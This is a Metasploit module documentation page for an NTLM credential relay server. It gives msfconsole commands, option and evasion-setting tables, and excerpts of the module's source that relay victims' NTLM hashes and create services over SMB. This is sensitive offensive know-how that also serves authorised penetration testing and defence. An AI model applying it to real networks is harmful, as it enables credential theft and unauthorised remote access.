HTTP Client MS Credential Relayer - Metasploit
This page contains detailed information about how to use the auxiliary/server/http_ntlmrelay metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: HTTP Client MS Credential Relayer
Module: auxiliary/server/http_ntlmrelay
Source code: modules/auxiliary/server/http_ntlmrelay.rb
Disclosure date: -
Last modification time: 2021-01-28 10:35:25 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: -
This module relays negotiated NTLM Credentials from an HTTP server to multiple protocols. Currently, this module supports relaying to SMB and HTTP. Complicated custom attacks requiring multiple requests that depend on each other can be written using the SYNC* options. For example, a CSRF-style attack might first set an HTTP_GET request with a unique SNYNCID and set an HTTP_POST request with a SYNCFILE, which contains logic to look through the database and parse out important values, such as the CSRF token or authentication cookies, setting these as configuration options, and finally create a web page with iframe elements pointing at the HTTP_GET and HTTP_POSTs.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Basic Usage
msf > use auxiliary/server/http_ntlmrelay
msf auxiliary(http_ntlmrelay) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Go back to menu.
Msfconsole Usage
Here is how the server/http_ntlmrelay auxiliary module looks in the msfconsole:
msf6 > use auxiliary/server/http_ntlmrelay
msf6 auxiliary(server/http_ntlmrelay) > show info
Name: HTTP Client MS Credential Relayer
Module: auxiliary/server/http_ntlmrelay
License: Metasploit Framework License (BSD)
Rank: Normal
Provided by:
Rich Lundeen <[email protected]>
Available actions:
Name Description
---- -----------
WebServer Start web server waiting for incoming authenticated connections
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPUTDATA no PUTDATA, but specified by a local file
PUTDATA no This is the HTTP_POST or SMB_PUT data
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
RSSL false yes SSL on the remote connection
RTYPE HTTP_GET yes Type of action to perform on remote target (Accepted: HTTP_GET, HTTP_POST, SMB_GET, SMB_PUT, SMB_RM, SMB_ENUM, SMB_LS, SMB_PWN)
RURIPATH / yes The path to relay credentials
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SYNCFILE no Local Ruby file to eval dynamically
SYNCID no ID to identify a request saved to db
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Description:
This module relays negotiated NTLM Credentials from an HTTP server
to multiple protocols. Currently, this module supports relaying to
SMB and HTTP. Complicated custom attacks requiring multiple requests
that depend on each other can be written using the SYNC* options.
For example, a CSRF-style attack might first set an HTTP_GET request
with a unique SNYNCID and set an HTTP_POST request with a SYNCFILE,
which contains logic to look through the database and parse out
important values, such as the CSRF token or authentication cookies,
setting these as configuration options, and finally create a web
page with iframe elements pointing at the HTTP_GET and HTTP_POSTs.
Module Options
This is a complete list of options available in the server/http_ntlmrelay auxiliary module:
msf6 auxiliary(server/http_ntlmrelay) > show options
Module options (auxiliary/server/http_ntlmrelay):
Name Current Setting Required Description
---- --------------- -------- -----------
FILEPUTDATA no PUTDATA, but specified by a local file
PUTDATA no This is the HTTP_POST or SMB_PUT data
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
RSSL false yes SSL on the remote connection
RTYPE HTTP_GET yes Type of action to perform on remote target (Accepted: HTTP_GET, HTTP_POST, SMB_GET, SMB_PUT, SMB_RM, SMB_ENUM, SMB_LS, SMB_PWN)
RURIPATH / yes The path to relay credentials
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
SYNCFILE no Local Ruby file to eval dynamically
SYNCID no ID to identify a request saved to db
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Auxiliary action:
Name Description
---- -----------
WebServer Start web server waiting for incoming authenticated connections
Advanced Options
Here is a complete list of advanced options supported by the server/http_ntlmrelay auxiliary module:
msf6 auxiliary(server/http_ntlmrelay) > show advanced
Module advanced options (auxiliary/server/http_ntlmrelay):
Name Current Setting Required Description
---- --------------- -------- -----------
DigestAuthIIS true no Conform to IIS, should work for most servers. Only set to false for non-IIS servers
FingerprintCheck true no Conduct a pre-exploit fingerprint verification
HTTP_HEADERFILE no File specifying extra HTTP_* headers (cookies, multipart, etc.)
HttpClientTimeout no HTTP connection and receive timeout
HttpPassword no The HTTP password to specify for authentication
HttpRawHeaders no Path to ERB-templatized raw headers to append to existing headers
HttpTrace false no Show the raw HTTP requests and responses
HttpTraceColors red/blu no HTTP request and response colors for HttpTrace (unset to disable)
HttpTraceHeadersOnly false no Show HTTP headers only in HttpTrace
HttpUsername no The HTTP username to specify for authentication
ListenerComm no The specific communication channel to use for this service
RESPPAGE no The file used for the server response. (Image extensions matter)
SMB_SHARES IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol no The shares to check with SMB_ENUM
SSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
SSLCompression false no Enable SSL/TLS-level compression
SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
SendRobots false no Return a robots.txt file if asked for one
URIHOST no Host to use in URI (useful for tunnels)
URIPORT no Port to use in URI (useful for tunnels)
UserAgent Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) no The User-Agent header to use for all requests
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the server/http_ntlmrelay module can do:
msf6 auxiliary(server/http_ntlmrelay) > show actions
Auxiliary actions:
Name Description
---- -----------
WebServer Start web server waiting for incoming authenticated connections
Evasion Options
Here is the full list of possible evasion options supported by the server/http_ntlmrelay auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(server/http_ntlmrelay) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
HTML::base64 none no Enable HTML obfuscation via an embeded base64 html object (IE not supported) (Accepted: none, plain, single_pad, double_pad, random_space_injection)
HTML::javascript::escape 0 no Enable HTML obfuscation via HTML escaping (number of iterations)
HTML::unicode none no Enable HTTP obfuscation via unicode (Accepted: none, utf-16le, utf-16be, utf-16be-marker, utf-32le, utf-32be)
HTTP::chunked false no Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
HTTP::compression none no Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
HTTP::header_folding false no Enable folding of HTTP headers
HTTP::junk_headers false no Enable insertion of random junk HTTP headers
HTTP::method_random_case false no Use random casing for the HTTP method
HTTP::method_random_invalid false no Use a random invalid, HTTP method for request
HTTP::method_random_valid false no Use a random, but valid, HTTP method for request
HTTP::no_cache false no Disallow the browser to cache HTTP content
HTTP::pad_fake_headers false no Insert random, fake headers into the HTTP request
HTTP::pad_fake_headers_count 0 no How many fake headers to insert into the HTTP request
HTTP::pad_get_params false no Insert random, fake query string variables into the request
HTTP::pad_get_params_count 16 no How many fake query string variables to insert into the request
HTTP::pad_method_uri_count 1 no How many whitespace characters to use between the method and uri
HTTP::pad_method_uri_type space no What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
HTTP::pad_post_params false no Insert random, fake post variables into the request
HTTP::pad_post_params_count 16 no How many fake post variables to insert into the request
HTTP::pad_uri_version_count 1 no How many whitespace characters to use between the uri and version
HTTP::pad_uri_version_type space no What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
HTTP::server_name Apache yes Configures the Server header of all outgoing replies
HTTP::uri_dir_fake_relative false no Insert fake relative directories into the uri
HTTP::uri_dir_self_reference false no Insert self-referential directories into the uri
HTTP::uri_encode_mode hex-normal no Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
HTTP::uri_fake_end false no Add a fake end of URI (eg: /%20HTTP/1.0/../../)
HTTP::uri_fake_params_start false no Add a fake start of params to the URI (eg: /%3fa=b/../)
HTTP::uri_full_url false no Use the full URL for all HTTP requests
HTTP::uri_use_backslashes false no Use back slashes instead of forward slashes in the uri
HTTP::version_random_invalid false no Use a random invalid, HTTP version for request
HTTP::version_random_valid false no Use a random, but valid, HTTP version for request
TCP::max_send_size 0 no Maximum tcp segment size. (0 = disable)
TCP::send_delay 0 no Delays inserted before every send. (0 = disable)
Go back to menu.
Error Messages
This module may fail with the following error messages:
- <RHOST> is not requesting authentication.
- Error: Type3 hash not relayed.
- Error: Bad NTLM sent from victim browser
- PUTDATA and FILEPUTDATA cannot both contain data
- No database configured and verbose disabled, info may be lost. Continuing
- SYNCFILE unreadable, aborting
- HTTP_HEADERFILE unreadable, aborting
- Auth not successful, returned a 401
- Could not connect to target host (<TARGET_HOST>)
- Type 2 response not read properly from server
- ErrorClass
- ErrorClass
- Error: <E>
- Error: <E>
- Error: <E>
- Error: <E>
- Error: <E>
- Problem processing respfile. Continuing...
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
<RHOST> is not requesting authentication.
Here is a relevant code snippet related to the "<RHOST> is not requesting authentication." error message:
150: when 'HTTP'
151: resp, ser_sock = http_relay_toserver(hash)
152: if resp.headers["WWW-Authenticate"]
153: t2hash = resp.headers["WWW-Authenticate"].split(" ")[1]
154: else
155: print_error "#{rhost} is not requesting authentication."
156: cli_sock.close
157: ser_sock.close
158: return false
159: end
160: when 'SMB'
Error: Type3 hash not relayed.
Here is a relevant code snippet related to the "Error: Type3 hash not relayed." error message:
177: cli_type3Data = cli_sock.get_once(-1, 5)
178: begin
179: cli_type3Header = cli_type3Data.split(/\r\nAuthorization:\s+NTLM\s+/,2)[1]
180: cli_type3Hash = cli_type3Header.split(/\r\n/,2)[0]
181: rescue ::NoMethodError
182: print_error("Error: Type3 hash not relayed.")
183: cli_sock.close()
184: return false
185: end
186: case protocol
187: when 'HTTP'
Error: Bad NTLM sent from victim browser
Here is a relevant code snippet related to the "Error: Bad NTLM sent from victim browser" error message:
214: if protocol == 'HTTP'
215: ser_sock.close()
216: end
217: return
218: else
219: print_error("Error: Bad NTLM sent from victim browser")
220: cli_sock.close()
221: return false
222: end
223: end
224:
PUTDATA and FILEPUTDATA cannot both contain data
Here is a relevant code snippet related to the "PUTDATA and FILEPUTDATA cannot both contain data" error message:
223: end
224:
225: def parse_args()
226: # Consolidate the PUTDATA and FILEPUTDATA options into FINALPUTDATA
227: if datastore['PUTDATA'] != nil and datastore['FILEPUTDATA'] != nil
228: print_error("PUTDATA and FILEPUTDATA cannot both contain data")
229: raise ArgumentError
230: elsif datastore['PUTDATA'] != nil
231: @finalputdata = datastore['PUTDATA']
232: elsif datastore['FILEPUTDATA'] != nil
233: f = File.open(datastore['FILEPUTDATA'], "rb")
No database configured and verbose disabled, info may be lost. Continuing
Here is a relevant code snippet related to the "No database configured and verbose disabled, info may be lost. Continuing" error message:
234: @finalputdata = f.read
235: f.close
236: end
237:
238: if (not framework.db.active) and (not datastore['VERBOSE'])
239: print_error("No database configured and verbose disabled, info may be lost. Continuing")
240: end
241: end
242:
243: # sync_options dynamically changes the arguments of a running attack
244: # this is useful for multi staged relay attacks
SYNCFILE unreadable, aborting
Here is a relevant code snippet related to the "SYNCFILE unreadable, aborting" error message:
245: # ideally I would use a resource file but it's not easily exposed, and this is simpler
246: def sync_options()
247: print_status("Dynamically eval()'ing local ruby file: #{datastore['SYNCFILE']}")
248: # previous request might create the file, so error thrown at runtime
249: if not ::File.readable?(datastore['SYNCFILE'])
250: print_error("SYNCFILE unreadable, aborting")
251: raise ArgumentError
252: end
253: data = ::File.read(datastore['SYNCFILE'])
254: eval(data) # WARNING: This can be insanely insecure!
255: end
HTTP_HEADERFILE unreadable, aborting
Here is a relevant code snippet related to the "HTTP_HEADERFILE unreadable, aborting" error message:
266: # HTTP_HEADERFILE is how this module supports cookies, multipart forms, etc
267: if datastore['HTTP_HEADERFILE'] != nil
268: print_status("Including extra headers from: #{datastore['HTTP_HEADERFILE']}")
269: # previous request might create the file, so error thrown at runtime
270: if not ::File.readable?(datastore['HTTP_HEADERFILE'])
271: print_error("HTTP_HEADERFILE unreadable, aborting")
272: raise ArgumentError
273: end
274: # read file line by line to deal with any dos/unix ending ambiguity
275: File.readlines(datastore['HTTP_HEADERFILE']).each do|header|
276: next if header.strip == ''
Auth not successful, returned a 401
Here is a relevant code snippet related to the "Auth not successful, returned a 401" error message:
298:
299: # Type3 processing
300: if type3
301: # check if auth was successful
302: if resp.code == 401
303: print_error("Auth not successful, returned a 401")
304: else
305: print_good("Auth successful, saving server response in database")
306: end
307: vprint_status(resp.to_s)
308: end
Could not connect to target host (<TARGET_HOST>)
Here is a relevant code snippet related to the "Could not connect to target host (<TARGET_HOST>)" error message:
320: 'Msf' => framework,
321: 'MsfExploit'=> self,
322: }
323: )
324: if (not rsock)
325: print_error("Could not connect to target host (#{target_host})")
326: return
327: end
328: ser_sock = Rex::Proto::SMB::SimpleClient.new(rsock, rport == 445 ? true : false, [1])
329:
330: if (datastore['RPORT'] == '139')
Type 2 response not read properly from server
Here is a relevant code snippet related to the "Type 2 response not read properly from server" error message:
344: #lazy ntlmsspblob extraction
345: ntlmsspblob = 'NTLMSSP' <<
346: (resp.to_s().split('NTLMSSP')[1].split("\x00\x00Win")[0]) <<
347: "\x00\x00"
348: rescue ::Exception => e
349: print_error("Type 2 response not read properly from server")
350: raise e
351: end
352: ntlmsspencodedblob = Rex::Text.encode_base64(ntlmsspblob)
353: return [ntlmsspencodedblob, ser_sock]
354: end
ErrorClass
Here is a relevant code snippet related to the "ErrorClass" error message:
376: ser_sock.client.auth_user_id
377: )
378: resp = ser_sock.client.smb_recv_parse(CONST::SMB_COM_SESSION_SETUP_ANDX, true)
379:
380: # check if auth was successful
381: if (resp['Payload']['SMB'].v['ErrorClass'] == 0)
382: print_status("SMB auth relay succeeded")
383: else
384: failure = Rex::Proto::SMB::Exceptions::ErrorCode.new
385: failure.word_count = resp['Payload']['SMB'].v['WordCount']
386: failure.command = resp['Payload']['SMB'].v['Command']
ErrorClass
Here is a relevant code snippet related to the "ErrorClass" error message:
382: print_status("SMB auth relay succeeded")
383: else
384: failure = Rex::Proto::SMB::Exceptions::ErrorCode.new
385: failure.word_count = resp['Payload']['SMB'].v['WordCount']
386: failure.command = resp['Payload']['SMB'].v['Command']
387: failure.error_code = resp['Payload']['SMB'].v['ErrorClass']
388: raise failure
389: end
390: return ser_sock
391: end
392:
Error: <E>
Here is a relevant code snippet related to the "Error: <E>" error message:
490: response = dcerpc.call(0x0f, stubdata)
491: if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
492: scm_handle = dcerpc.last_response.stub_data[0,20]
493: end
494: rescue ::Exception => e
495: print_error("Error: #{e}")
496: return
497: end
498:
499: print_status("Creating a new service")
500:
Error: <E>
Here is a relevant code snippet related to the "Error: <E>" error message:
525: if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
526: svc_handle = dcerpc.last_response.stub_data[0,20]
527: #svc_status = dcerpc.last_response.stub_data[24,4]
528: end
529: rescue ::Exception => e
530: print_error("Error: #{e}")
531: return
532: end
533:
534: print_status("Closing service handle...")
535: begin
Error: <E>
Here is a relevant code snippet related to the "Error: <E>" error message:
547: response = dcerpc.call(0x10, stubdata)
548: if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
549: svc_handle = dcerpc.last_response.stub_data[0,20]
550: end
551: rescue ::Exception => e
552: print_error("Error: #{e}")
553: return
554: end
555:
556: print_status("Starting the service...")
557: stubdata =
Error: <E>
Here is a relevant code snippet related to the "Error: <E>" error message:
572: begin
573: response = dcerpc.call(0x02, stubdata)
574: if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
575: end
576: rescue ::Exception => e
577: print_error("Error: #{e}")
578: end
579:
580: print_status("Closing service handle...")
581: begin
582: response = dcerpc.call(0x0, svc_handle)
Error: <E>
Here is a relevant code snippet related to the "Error: <E>" error message:
579:
580: print_status("Closing service handle...")
581: begin
582: response = dcerpc.call(0x0, svc_handle)
583: rescue ::Exception => e
584: print_error("Error: #{e}")
585: end
586:
587: ser_sock.disconnect("IPC$")
588: end
589:
Problem processing respfile. Continuing...
Here is a relevant code snippet related to the "Problem processing respfile. Continuing..." error message:
662: when 'png', 'gif', 'jpg', 'jpeg'
663: print_status('setting content type to image')
664: response.headers['Content-Type'] = "image/" << type
665: end
666: rescue
667: print_error("Problem processing respfile. Continuing...")
668: end
669: end
670: if (response.body.empty?)
671: response.body = "<HTML><HEAD><TITLE>My Page</TITLE></HEAD></HTML>"
672: end
Go back to menu.
Related Pull Requests
- #14696 Merged Pull Request: Zeitwerk rex folder
- #13417 Merged Pull Request: SMBv3 integration with Framework
- #13443 Merged Pull Request: Add descriptions to auxiliary modules Actions
- #8851 Merged Pull Request: unknow to unknown
- #8716 Merged Pull Request: Print_Status -> Print_Good (And OCD bits 'n bobs)
- #8338 Merged Pull Request: Fix msf/core and self.class msftidy warnings
- #6706 Merged Pull Request: Print response fix for HTTP NTLM
- #6655 Merged Pull Request: use MetasploitModule as a class name
- #6648 Merged Pull Request: Change metasploit class names
- #5059 Merged Pull Request: Yard doc corrections
- #3316 Merged Pull Request: Bug with HTTP POST requests (content type sent twice)
- #2525 Merged Pull Request: Change module boilerplate
- #2464 Merged Pull Request: Various fixes for auxiliary/spoof/llmnr/llmnr_response and related stuff
- #1482 Merged Pull Request: Unmerge #1476 and #1444
- #1228 Merged Pull Request: MSFTIDY cleanup #1 - auxiliary
- #1047 Merged Pull Request: Set normalize uri on modules
- #951 Merged Pull Request: Infohash cleanups
- #925 Merged Pull Request: msftidy corrections
- #721 Merged Pull Request: Add non-authed OPTIONS response to support WebDAV
Go back to menu.
See Also
Check also the following modules related to this module:
- auxiliary/dos/windows/http/http_sys_accept_encoding_dos_cve_2021_31166
- auxiliary/fuzzers/http/http_form_field
- auxiliary/fuzzers/http/http_get_uri_long
- auxiliary/fuzzers/http/http_get_uri_strings
- auxiliary/gather/http_pdf_authors
- auxiliary/scanner/http/http_header
- auxiliary/scanner/http/http_hsts
- auxiliary/scanner/http/http_login
- auxiliary/scanner/http/http_put
- auxiliary/scanner/http/http_sickrage_password_leak
- auxiliary/scanner/http/http_traversal
- auxiliary/scanner/http/http_version
- auxiliary/server/capture/http_basic
- auxiliary/server/capture/http_javascript_keylogger
- auxiliary/server/capture/http_ntlm
- auxiliary/server/capture/http
Authors
- Rich Lundeen <richard.lundeen[at]gmail.com>
Version
This page has been produced using Metasploit Framework version 6.1.36-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.